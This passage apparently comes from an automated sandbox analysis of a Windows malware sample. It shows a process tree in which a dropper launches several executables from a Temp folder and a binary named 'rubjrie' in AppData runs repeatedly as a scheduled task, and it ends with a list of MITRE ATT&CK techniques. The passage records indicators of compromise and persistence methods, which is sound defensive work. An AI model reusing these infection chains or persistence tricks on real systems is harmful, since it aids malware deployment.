        "C:\Users\Admin\AppData\Local\Temp\is-7SA3M.tmp\Sun03f5d51697d04.tmp" /SL5="$6015C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03f5d51697d04.exe" /SILENT
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:1248
        
        C:\Users\Admin\AppData\Local\Temp\is-17BI7.tmp\postback.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-17BI7.tmp\postback.exe" ss1
        9⤵
        Executes dropped EXE
        
        PID:2560
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun0328255c4bce6fb.exe
      4⤵
      Loads dropped DLL
      PID:1340
    - - C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun0328255c4bce6fb.exe
        
        Sun0328255c4bce6fb.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:268
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun0351a0558292.exe
      4⤵
      Loads dropped DLL
      PID:2032
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun038db98f99bf9a.exe
      4⤵
      Loads dropped DLL
      PID:1228
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun0324aba28588c0.exe
      4⤵
      Loads dropped DLL
      PID:1100

C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun038db98f99bf9a.exe
Sun038db98f99bf9a.exe
1⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:288
- C:\Users\Admin\Pictures\Adobe Films\BnbpIxC5RaMUqdV08_JMLpxz.exe
  "C:\Users\Admin\Pictures\Adobe Films\BnbpIxC5RaMUqdV08_JMLpxz.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:2552
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 288 -s 1460
  2⤵
  - Program crash
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  PID:2856

C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun0351a0558292.exe
Sun0351a0558292.exe
1⤵
- Executes dropped EXE
PID:784

C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun0324aba28588c0.exe
Sun0324aba28588c0.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:568

C:\Windows\system32\taskeng.exe
taskeng.exe {B8A71648-C2F1-4DCE-9819-BBC0962E72E2} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:3304

C:\Windows\system32\taskeng.exe
taskeng.exe {82FA15F3-0BCF-4A05-8BF1-3F895C4EBC34} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:2460
- C:\Program Files\Mozilla Firefox\default-browser-agent.exe
  "C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task
  2⤵
  PID:1588

C:\Windows\system32\taskeng.exe
taskeng.exe {30ACE16C-3036-4842-887E-2F0777181E87} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1208

C:\Windows\system32\taskeng.exe
taskeng.exe {D79F1DC9-584F-48AF-B3B6-9FED6C92A61F} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:2184
- C:\Users\Admin\AppData\Roaming\rubjrie
  C:\Users\Admin\AppData\Roaming\rubjrie
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:1340
- C:\Users\Admin\AppData\Roaming\rubjrie
  C:\Users\Admin\AppData\Roaming\rubjrie
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:2576

C:\Windows\system32\taskeng.exe
taskeng.exe {E4458B1C-1B45-4CD1-83DC-DA06B03BA4F5} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:3240

C:\Windows\system32\taskeng.exe
taskeng.exe {A93E91ED-18D0-4FEF-B980-679C4C5E17AA} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:908
- C:\Users\Admin\AppData\Roaming\rubjrie
  C:\Users\Admin\AppData\Roaming\rubjrie
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:2324
- C:\Users\Admin\AppData\Roaming\rubjrie
  C:\Users\Admin\AppData\Roaming\rubjrie
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:2136

C:\Windows\system32\taskeng.exe
taskeng.exe {1588C7E1-306E-4582-98FE-B74CBF4576C1} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:2984
- C:\Users\Admin\AppData\Roaming\rubjrie
  C:\Users\Admin\AppData\Roaming\rubjrie
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:3220

C:\Windows\system32\taskeng.exe
taskeng.exe {8944224B-FAAE-4040-B3D7-0B182F282BDE} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:4000
- C:\Users\Admin\AppData\Roaming\rubjrie
  C:\Users\Admin\AppData\Roaming\rubjrie
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:3676

C:\Windows\system32\taskeng.exe
taskeng.exe {DBF51DCC-482A-425D-9125-C1E783CB792E} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:2984
- C:\Users\Admin\AppData\Roaming\rubjrie
  C:\Users\Admin\AppData\Roaming\rubjrie
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:3884

C:\Windows\system32\taskeng.exe
taskeng.exe {83C8B9D5-9CC6-490F-BAA1-E0220A4A24A6} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:304
- C:\Users\Admin\AppData\Roaming\rubjrie
  C:\Users\Admin\AppData\Roaming\rubjrie
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:3760
- C:\Users\Admin\AppData\Roaming\rubjrie
  C:\Users\Admin\AppData\Roaming\rubjrie
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:1132
- C:\Users\Admin\AppData\Roaming\rubjrie
  C:\Users\Admin\AppData\Roaming\rubjrie
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:1076
- C:\Users\Admin\AppData\Roaming\rubjrie
  C:\Users\Admin\AppData\Roaming\rubjrie
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:2856

C:\Windows\system32\taskeng.exe
taskeng.exe {E8249D7D-06AE-4CE1-A560-E44CC03453F3} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1108

C:\Windows\system32\taskeng.exe
taskeng.exe {61AA83B0-9DCA-4A11-B65A-B052056DC9DC} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:3208
- C:\Users\Admin\AppData\Roaming\rubjrie
  C:\Users\Admin\AppData\Roaming\rubjrie
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:2688

C:\Windows\system32\taskeng.exe
taskeng.exe {57A111E9-F830-475A-AB46-63EC6F4F29AB} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:2996
- C:\Users\Admin\AppData\Roaming\rubjrie
  C:\Users\Admin\AppData\Roaming\rubjrie
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:4000

C:\Windows\system32\taskeng.exe
taskeng.exe {43CF3700-1E66-498C-886E-D14A237D4C71} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:3624
- C:\Users\Admin\AppData\Roaming\rubjrie
  C:\Users\Admin\AppData\Roaming\rubjrie
  2⤵
  PID:3856

C:\Windows\system32\taskeng.exe
taskeng.exe {43FCC5DC-1DB9-4856-A76B-C3A47A6A77E7} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:2452

C:\Windows\system32\taskeng.exe
taskeng.exe {2588C268-8A98-4819-B547-A44DAE026A20} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:1756
- C:\Users\Admin\AppData\Roaming\rubjrie
  C:\Users\Admin\AppData\Roaming\rubjrie
  2⤵
  PID:3332

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Disabling Security Tools

T1089

Install Root Certificate

T1130

Modify Registry

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery